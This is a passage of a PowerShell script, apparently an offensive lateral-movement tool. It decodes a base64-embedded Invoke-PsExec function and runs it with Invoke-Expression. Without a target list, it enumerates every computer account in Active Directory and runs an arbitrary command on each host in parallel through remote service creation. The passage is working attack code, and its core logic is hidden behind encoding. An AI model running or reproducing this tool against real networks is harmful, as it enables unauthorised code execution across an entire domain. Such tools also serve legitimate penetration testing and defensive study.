ydmljZSBuYW1lLmBuIgogICAgICAgICAgICB9CiAgICAgICAgICAgIAogICAgICAgICAgICAjIGZpbmFsIGNsZWFudXAgLSBjbG9zZSBvZmYgdGhlIG1hbmFnZXIgaGFuZGxlCiAgICAgICAgICAgICMgIlsqXSBDbG9zaW5nIHRoZSBtYW5hZ2VyIGhhbmRsZSIKICAgICAgICAgICAgJHQgPSAkQ2xvc2VTZXJ2aWNlSGFuZGxlLkludm9rZSgkTWFuYWdlckhhbmRsZSkKICAgICAgICB9CiAgICAgICAgZWxzZSB7CiAgICAgICAgICAgICMgZXJyb3IgY29kZXMgLSBodHRwOi8vbXNkbi5taWNyb3NvZnQuY29tL2VuLXVzL2xpYnJhcnkvd2luZG93cy9kZXNrdG9wL21zNjgxMzgxKHY9dnMuODUpLmFzcHgKICAgICAgICAgICAgJGVyciA9ICRHZXRMYXN0RXJyb3IuSW52b2tlKCkKICAgICAgICAgICAgIyBXcml0ZS1XYXJuaW5nICJbIV0gT3BlblNDTWFuYWdlciBmYWlsZWQsIExhc3RFcnJvcjogJGVyciIKICAgICAgICAgICAgIyJbIV0gT3BlblNDTWFuYWdlciBmYWlsZWQsIExhc3RFcnJvcjogJGVyciIKICAgICAgICB9CiAgICB9CgogICAgSW52b2tlLVBzRXhlY0NtZCAtQ29tcHV0ZXJOYW1lICRDb21wdXRlck5hbWUgLUNvbW1hbmQgJENvbW1hbmQgLVNlcnZpY2VOYW1lICRTZXJ2aWNlTmFtZQogICAgICAgIAp9
'@
$bytes = [Convert]::FromBase64String($invoke_psexec)
$invoke_psexecDec = [System.Text.Encoding]::UTF8.GetString($bytes)
}
Process {
if ($Computerfile) {
$Computers = Get-Content $Computerfile
}
elseif ($ComputerName) {
$Computers = $ComputerName
}
else {
$localFQDN = [System.Net.Dns]::GetHostEntry($env:COMPUTERNAME).HostName
$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher
$DirectorySearcher.SearchRoot = New-Object System.DirectoryServices.DirectoryEntry
$DirectorySearcher.Filter = "(&(sAMAccountType=805306369))"
$Computers = $DirectorySearcher.FindAll() | ForEach-Object {
$hostname = $_.properties["dnshostname"]
if ($hostname -and $hostname -ne $localFQDN) {
$hostname
}
}
}
$runspacePool = [runspacefactory]::CreateRunspacePool(1, $threads)
$runspacePool.Open()
$runspaces = @()
foreach ($ComputerName in $Computers) {
"`n[*] Trying $ComputerName..."
$ps = [powershell]::Create()
$ps.RunspacePool = $runspacePool
$ps.AddScript({
param($ComputerName, $Command, $ServiceName, $invoke_psexecDec)
Invoke-Expression $invoke_psexecDec
Invoke-PsExec -ComputerName $ComputerName -Command $Command -ServiceName $ServiceName
}).AddArgument($ComputerName).AddArgument($Command).AddArgument($ServiceName).AddArgument($invoke_psexecDec) > $null
$runspaces += [PSCustomObject]@{
PowerShell = $ps
Handle = $ps.BeginInvoke()
}
}
foreach ($rs in $runspaces) {
#Write-Host " Time started on $($rs.PowerShell.InstanceId)"
$handle = $rs.Handle.AsyncWaitHandle
if ($handle.WaitOne($timeout)) {
#Write-Host "Time over on $($rs.PowerShell.InstanceId)"
$output = $rs.PowerShell.EndInvoke($rs.Handle)
foreach ($line in $output) {
if ($line -is [string]) {
Write-Host $line
}
}
}
else {
#Write-Host " Timeout on $($rs.PowerShell.InstanceId)"
continue
}
$rs.PowerShell.Dispose()
}
}
End {
try {
$ErrorActionPreference = $ErrorActionPreference2
#Write-Host "Completed"
}
catch {
}
}
}